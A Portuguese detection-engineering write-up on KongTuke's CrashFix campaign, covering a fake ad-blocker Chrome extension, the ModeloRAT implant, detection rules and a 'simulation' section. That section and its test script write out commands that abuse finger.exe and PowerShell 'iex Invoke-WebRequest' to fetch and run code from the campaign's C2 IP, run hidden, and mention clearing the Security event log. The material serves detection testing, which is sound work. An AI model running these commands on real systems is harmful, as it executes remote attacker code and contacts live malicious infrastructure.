Dissecando o CrashFix: O Novo Brinquedo de KongTuke
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
KongTuke distribuiu uma extensão maliciosa do Chrome, NexShield, imitando o uBlock Origin Lite. Uma vez instalada, ela exibe um aviso de segurança “CrashFix” para simular um incidente legítimo de segurança do navegador, travando o navegador e coagindo o usuário a executar um comando malicioso de PowerShell copiado para a área de transferência. A campanha implanta um RAT Python, ModeloRAT, em sistemas conectados ao domínio e uma cadeia multiestágio de PowerShell em hosts independentes.
Investigação
Os analistas da Huntress revisaram o código da extensão, vincularam o comando e controle ao nexsnield.com e realizaram engenharia reversa das cargas úteis. Eles observaram o abuso do finger.exe como um LOLBin para recuperar instruções do invasor, além de um DGA que gera domínios .top. Para ambientes em um domínio, os pesquisadores identificaram um implante Python criptografado com RC4 que persiste através da chave Run do HKCU. Técnicas adicionais incluíram verificações de anti-análise, bypass da AMSI, e táticas de exaustão de recursos destinadas a pressionar os usuários a uma conformidade total rápida.
Mitigação
Bloqueie o ID da extensão do Chrome e monitore extensões desconhecidas que imitam bloqueadores de anúncios populares. Detecte beaconing para nexsnield.com, os IPs de C2 e domínios produzidos por DGA. Aplique controle de execução para limitar o uso de LOLBin (incluindo finger.exe) e alerte sobre valores suspeitos de chave Run, particularmente nomes criados para se assemelhar a softwares amplamente utilizados.
Resposta
Alerta sobre instalações de extensões relacionadas ao NexShield e correlacione com conexões de saída para a infraestrutura C2 e DGA identificada. Isole hosts afetados e colete artefatos de extensão, chaves de registro Run, tarefas agendadas e arquivos descartados. Remova a persistência do ModeloRAT, erradique componentes de estágio PowerShell e remedeie e valide o endpoint.
Fluxo de ataque
Detecções
Chamar Métodos .NET Suspeitos a partir do Powershell (via powershell)
Visualizar
Uso suspeito de CURL (via linha de comando)
Visualizar
Nome de Arquivo Curto (via linha de comando)
Visualizar
Possível Operação Manual ou de Script foi Realizada em Pastas Incomuns (via linha de comando)
Visualizar
Strings Suspeitas do Powershell (via powershell)
Visualizar
Chamar Funções de API do Windows Suspeitas a partir do Powershell (via powershell)
Visualizar
Possíveis Pontos de Persistência [ASEPs – Hive de Software/NTUSER] (via evento de registro)
Visualizar
Um Arquivo foi Extraído para um Diretório Suspeito Usando o Powershell (via powershell)
Visualizar
Execução de Python a partir de Pastas Suspeitas (via linha de comando)
Visualizar
Possíveis Indicadores de Ofuscação do Powershell (via powershell)
Visualizar
Possível Enumeração do Sistema (via linha de comando)
Visualizar
Download ou Upload via Powershell (via linha de comando)
Visualizar
IOCs (SourceIP) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke
Visualizar
IOCs (HashSha256) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke
Visualizar
IOCs (DestinationIP) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke
Visualizar
IOCs (Emails) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke
Visualizar
Detectar Execução de Comando Malicioso do KongTuke CrashFix [Criação de Processo do Windows]
Visualizar
Detecção de Bypass da AMSI e Remoção de Evidências via PowerShell [Windows Powershell]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação de Telemetria e Linha de Base Pré-voo deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque e Comandos:
O adversário primeiro copia o legítimofinger.exebinário para o diretório temporário, renomeia-o paract.exe, e então usa umcmd /caninhado para invocar o binário copiado com um argumento elaborado que contacta um servidor remoto C2 (199.217.98.108). O binário transmite a carga de volta para a linha de comando, que então é enviada para um segundocmdoculto que executa o código recebido. Depois, o invasor usa o PowerShell para baixar uma carga secundária viaInvoke‑WebRequeste imediatamente a executa comiex. Todas as etapas são realizadas com interface de usuário mínima (/min) para evitar a detecção pelo usuário.1. Copiar finger.exe → %TEMP%ct.exe 2. Executar: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Baixar & executar carga secundária com PowerShell: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Script de Teste de Regressão: O script abaixo reproduz toda a cadeia de ataque em uma máquina de teste Windows. Execute-o em uma sessão de PowerShell com privilégios elevados.
#------------------------------------------------- # Execução de Comando Malicioso KongTuke CrashFix #------------------------------------------------- # 1. Implantar o LOLBin (finger.exe) para %TEMP% como ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Executar a cadeia de comando malicioso (corresponde à regra Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Download web do PowerShell e execução de carga secundária $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Comandos de Limpeza: Remova artefatos e finalize quaisquer processos remanescentes criados pelo teste.
# Delete the copied ct.exe Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Kill any stray cmd.exe or powershell.exe processes started by the test (filter by specific command line) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Optional: clear Event Log if needed for repeatability # wevlutil cl Security